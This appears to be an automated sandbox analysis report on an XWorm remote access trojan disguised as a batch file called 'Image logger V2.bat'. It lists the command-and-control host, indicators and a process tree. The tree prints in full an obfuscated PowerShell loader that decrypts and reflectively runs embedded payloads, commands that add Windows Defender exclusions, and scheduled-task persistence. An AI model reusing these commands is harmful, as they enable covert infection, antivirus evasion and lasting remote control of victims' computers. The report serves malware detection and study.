xworm | 2d17ba79048d0a46969907a6120505f4608f9a252af3a5a21bb875c08aaee2ef

Analysis

max time kernel
130s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2024 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Image logger V2.bat
Size

29.9MB
MD5

f9fe001633e62b59eec398eaeb5d9b3c
SHA1

edc9879fab5c9e69eca9814584a3079e93a4339d
SHA256

2d17ba79048d0a46969907a6120505f4608f9a252af3a5a21bb875c08aaee2ef
SHA512

0bebd885894e67d2490c55f9d07f7bdaf2e1c5aea1632739fb41b7a05fb6e2a997948dd22f6d1e5b4b1233a40d76ae326acd8d0ad1d54b0ae7c0d55be4da8a20
SSDEEP

49152:4JDhbOqBRZaVCQdy5U5CTCxA2HRHt21676CpcIZPxlwmCQ2VjDnMl/6xXh7r9EGV:47

Score

10^/10

xworm defense_evasion evasion execution persistence pyinstaller rat trojan

Malware Config

Extracted

Family

xworm

since-searching.gl.at.ply.gg:64197

Attributes

Install_directory
%ProgramData%
install_file
Helper.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4892-371-0x000000001AF10000-0x000000001AF2E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5052	powershell.exe
4632	powershell.exe
1052	powershell.exe
1656	powershell.exe
4756	powershell.exe
1572	powershell.exe
2988	powershell.exe
4088	powershell.exe
4100	powershell.exe
4324	powershell.exe
3508	powershell.exe
3880	powershell.exe
3556	powershell.exe
2476	powershell.exe
3940	powershell.exe
4348	powershell.exe
1388	powershell.exe
3128	powershell.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	WebhookSpammerV5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	Latite_Client_betterV1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	Latite Client_BetterV3.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk	Latite Client_BetterV3.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk	Latite Client_BetterV3.exe

Executes dropped EXE 11 IoCs

pid	Process
3116	Dice Roll Cheat.exe
3924	WebhookSpammerV5.exe
3060	Dice Roll Cheat.exe
5104	Latite_Client_betterV1.exe
2144	coolhi.exe
1952	coolhi.exe
4892	Latite Client_BetterV3.exe
1312	Latite Client_BetterV3.exe
3612	WebhookSpammerV5.exe
4864	Latite_Client_betterV1.exe
1028	WindowsDefender

Loads dropped DLL 32 IoCs

pid	Process
3060	Dice Roll Cheat.exe
3060	Dice Roll Cheat.exe
3060	Dice Roll Cheat.exe
3060	Dice Roll Cheat.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe
1952	coolhi.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\ProgramData\\WindowsDefender"	Latite Client_BetterV3.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
38	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\coolhi.exe	WebhookSpammerV5.exe
File created	C:\Windows\Latite_Client_betterV1.exe	WebhookSpammerV5.exe

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00080000000234b7-72.dat	pyinstaller
behavioral1/files/0x00070000000234cc-164.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
436	schtasks.exe
1076	schtasks.exe
3812	schtasks.exe
1836	schtasks.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
1388	powershell.exe
1388	powershell.exe
3128	powershell.exe
3128	powershell.exe
4348	powershell.exe
4348	powershell.exe
4100	powershell.exe
4100	powershell.exe
1052	powershell.exe
1052	powershell.exe
1656	powershell.exe
1656	powershell.exe
3340	powershell.exe
3340	powershell.exe
1652	powershell.exe
1652	powershell.exe
3340	powershell.exe
1652	powershell.exe
4756	powershell.exe
4756	powershell.exe
4756	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
3880	powershell.exe
3880	powershell.exe
3880	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
4744	powershell.exe
4744	powershell.exe
2956	powershell.exe
2956	powershell.exe
4744	powershell.exe
2956	powershell.exe
2988	powershell.exe
2988	powershell.exe
2988	powershell.exe
5052	powershell.exe
5052	powershell.exe
5052	powershell.exe
3556	powershell.exe
3556	powershell.exe
2476	powershell.exe
2476	powershell.exe
4632	powershell.exe
4632	powershell.exe
3940	powershell.exe
3940	powershell.exe
4088	powershell.exe
4088	powershell.exe
4892	Latite Client_BetterV3.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeIncreaseQuotaPrivilege	3128	powershell.exe
Token: SeSecurityPrivilege	3128	powershell.exe
Token: SeTakeOwnershipPrivilege	3128	powershell.exe
Token: SeLoadDriverPrivilege	3128	powershell.exe
Token: SeSystemProfilePrivilege	3128	powershell.exe
Token: SeSystemtimePrivilege	3128	powershell.exe
Token: SeProfSingleProcessPrivilege	3128	powershell.exe
Token: SeIncBasePriorityPrivilege	3128	powershell.exe
Token: SeCreatePagefilePrivilege	3128	powershell.exe
Token: SeBackupPrivilege	3128	powershell.exe
Token: SeRestorePrivilege	3128	powershell.exe
Token: SeShutdownPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeSystemEnvironmentPrivilege	3128	powershell.exe
Token: SeRemoteShutdownPrivilege	3128	powershell.exe
Token: SeUndockPrivilege	3128	powershell.exe
Token: SeManageVolumePrivilege	3128	powershell.exe
Token: 33	3128	powershell.exe
Token: 34	3128	powershell.exe
Token: 35	3128	powershell.exe
Token: 36	3128	powershell.exe
Token: SeIncreaseQuotaPrivilege	3128	powershell.exe
Token: SeSecurityPrivilege	3128	powershell.exe
Token: SeTakeOwnershipPrivilege	3128	powershell.exe
Token: SeLoadDriverPrivilege	3128	powershell.exe
Token: SeSystemProfilePrivilege	3128	powershell.exe
Token: SeSystemtimePrivilege	3128	powershell.exe
Token: SeProfSingleProcessPrivilege	3128	powershell.exe
Token: SeIncBasePriorityPrivilege	3128	powershell.exe
Token: SeCreatePagefilePrivilege	3128	powershell.exe
Token: SeBackupPrivilege	3128	powershell.exe
Token: SeRestorePrivilege	3128	powershell.exe
Token: SeShutdownPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeSystemEnvironmentPrivilege	3128	powershell.exe
Token: SeRemoteShutdownPrivilege	3128	powershell.exe
Token: SeUndockPrivilege	3128	powershell.exe
Token: SeManageVolumePrivilege	3128	powershell.exe
Token: 33	3128	powershell.exe
Token: 34	3128	powershell.exe
Token: 35	3128	powershell.exe
Token: 36	3128	powershell.exe
Token: SeIncreaseQuotaPrivilege	3128	powershell.exe
Token: SeSecurityPrivilege	3128	powershell.exe
Token: SeTakeOwnershipPrivilege	3128	powershell.exe
Token: SeLoadDriverPrivilege	3128	powershell.exe
Token: SeSystemProfilePrivilege	3128	powershell.exe
Token: SeSystemtimePrivilege	3128	powershell.exe
Token: SeProfSingleProcessPrivilege	3128	powershell.exe
Token: SeIncBasePriorityPrivilege	3128	powershell.exe
Token: SeCreatePagefilePrivilege	3128	powershell.exe
Token: SeBackupPrivilege	3128	powershell.exe
Token: SeRestorePrivilege	3128	powershell.exe
Token: SeShutdownPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeSystemEnvironmentPrivilege	3128	powershell.exe
Token: SeRemoteShutdownPrivilege	3128	powershell.exe
Token: SeUndockPrivilege	3128	powershell.exe
Token: SeManageVolumePrivilege	3128	powershell.exe
Token: 33	3128	powershell.exe
Token: 34	3128	powershell.exe
Token: 35	3128	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4892	Latite Client_BetterV3.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3140 wrote to memory of 4768	3140	cmd.exe	85
PID 3140 wrote to memory of 4768	3140	cmd.exe	85
PID 4768 wrote to memory of 3936	4768	net.exe	86
PID 4768 wrote to memory of 3936	4768	net.exe	86
PID 3140 wrote to memory of 1388	3140	cmd.exe	90
PID 3140 wrote to memory of 1388	3140	cmd.exe	90
PID 1388 wrote to memory of 3128	1388	powershell.exe	98
PID 1388 wrote to memory of 3128	1388	powershell.exe	98
PID 1388 wrote to memory of 4412	1388	powershell.exe	100
PID 1388 wrote to memory of 4412	1388	powershell.exe	100
PID 4412 wrote to memory of 2396	4412	WScript.exe	101
PID 4412 wrote to memory of 2396	4412	WScript.exe	101
PID 2396 wrote to memory of 2252	2396	cmd.exe	103
PID 2396 wrote to memory of 2252	2396	cmd.exe	103
PID 2252 wrote to memory of 512	2252	net.exe	104
PID 2252 wrote to memory of 512	2252	net.exe	104
PID 2396 wrote to memory of 4348	2396	cmd.exe	105
PID 2396 wrote to memory of 4348	2396	cmd.exe	105
PID 4348 wrote to memory of 1988	4348	powershell.exe	109
PID 4348 wrote to memory of 1988	4348	powershell.exe	109
PID 4348 wrote to memory of 3116	4348	powershell.exe	112
PID 4348 wrote to memory of 3116	4348	powershell.exe	112
PID 4348 wrote to memory of 3924	4348	powershell.exe	111
PID 4348 wrote to memory of 3924	4348	powershell.exe	111
PID 1988 wrote to memory of 2388	1988	cmd.exe	114
PID 1988 wrote to memory of 2388	1988	cmd.exe	114
PID 2388 wrote to memory of 3884	2388	net.exe	115
PID 2388 wrote to memory of 3884	2388	net.exe	115
PID 3116 wrote to memory of 3060	3116	Dice Roll Cheat.exe	116
PID 3116 wrote to memory of 3060	3116	Dice Roll Cheat.exe	116
PID 3924 wrote to memory of 4100	3924	WebhookSpammerV5.exe	117
PID 3924 wrote to memory of 4100	3924	WebhookSpammerV5.exe	117
PID 3924 wrote to memory of 1052	3924	WebhookSpammerV5.exe	119
PID 3924 wrote to memory of 1052	3924	WebhookSpammerV5.exe	119
PID 3924 wrote to memory of 1656	3924	WebhookSpammerV5.exe	121
PID 3924 wrote to memory of 1656	3924	WebhookSpammerV5.exe	121
PID 3924 wrote to memory of 1836	3924	WebhookSpammerV5.exe	123
PID 3924 wrote to memory of 1836	3924	WebhookSpammerV5.exe	123
PID 3924 wrote to memory of 3340	3924	WebhookSpammerV5.exe	125
PID 3924 wrote to memory of 3340	3924	WebhookSpammerV5.exe	125
PID 3924 wrote to memory of 1652	3924	WebhookSpammerV5.exe	127
PID 3924 wrote to memory of 1652	3924	WebhookSpammerV5.exe	127
PID 3924 wrote to memory of 5104	3924	WebhookSpammerV5.exe	129
PID 3924 wrote to memory of 5104	3924	WebhookSpammerV5.exe	129
PID 3924 wrote to memory of 2144	3924	WebhookSpammerV5.exe	130
PID 3924 wrote to memory of 2144	3924	WebhookSpammerV5.exe	130
PID 2144 wrote to memory of 1952	2144	coolhi.exe	132
PID 2144 wrote to memory of 1952	2144	coolhi.exe	132
PID 1952 wrote to memory of 4412	1952	coolhi.exe	133
PID 1952 wrote to memory of 4412	1952	coolhi.exe	133
PID 4412 wrote to memory of 4756	4412	cmd.exe	134
PID 4412 wrote to memory of 4756	4412	cmd.exe	134
PID 1952 wrote to memory of 4676	1952	coolhi.exe	135
PID 1952 wrote to memory of 4676	1952	coolhi.exe	135
PID 4676 wrote to memory of 4324	4676	cmd.exe	136
PID 4676 wrote to memory of 4324	4676	cmd.exe	136
PID 1952 wrote to memory of 1376	1952	coolhi.exe	137
PID 1952 wrote to memory of 1376	1952	coolhi.exe	137
PID 5104 wrote to memory of 3508	5104	Latite_Client_betterV1.exe	138
PID 5104 wrote to memory of 3508	5104	Latite_Client_betterV1.exe	138
PID 5104 wrote to memory of 3880	5104	Latite_Client_betterV1.exe	140
PID 5104 wrote to memory of 3880	5104	Latite_Client_betterV1.exe	140
PID 5104 wrote to memory of 1572	5104	Latite_Client_betterV1.exe	142
PID 5104 wrote to memory of 1572	5104	Latite_Client_betterV1.exe	142

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3140
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_572_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_572.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3128
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_572.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_572.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2396
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2252
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_572.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_572.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1988
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:3884
      - C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:3924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WebhookSpammerV5.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WebhookSpammerV5.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1656
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "WebhookSpammerV5" /tr "C:\ProgramData\WebhookSpammerV5.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdgBlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAagBzACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZgBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQByACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1652
        
        C:\Windows\Latite_Client_betterV1.exe
        
        "C:\Windows\Latite_Client_betterV1.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite_Client_betterV1.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Latite_Client_betterV1.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite_Client_betterV1.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1572
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite_Client_betterV1" /tr "C:\ProgramData\Latite_Client_betterV1.exe"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdABzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAbQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByACAAbgBvAHQAIAB3AG8AcgBrAGkAbgBnACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB6AHkAdAAjAD4A"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAeQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBmACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe"
        8⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3556
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite Client_BetterV3" /tr "C:\ProgramData\Latite Client_BetterV3.exe"
        9⤵
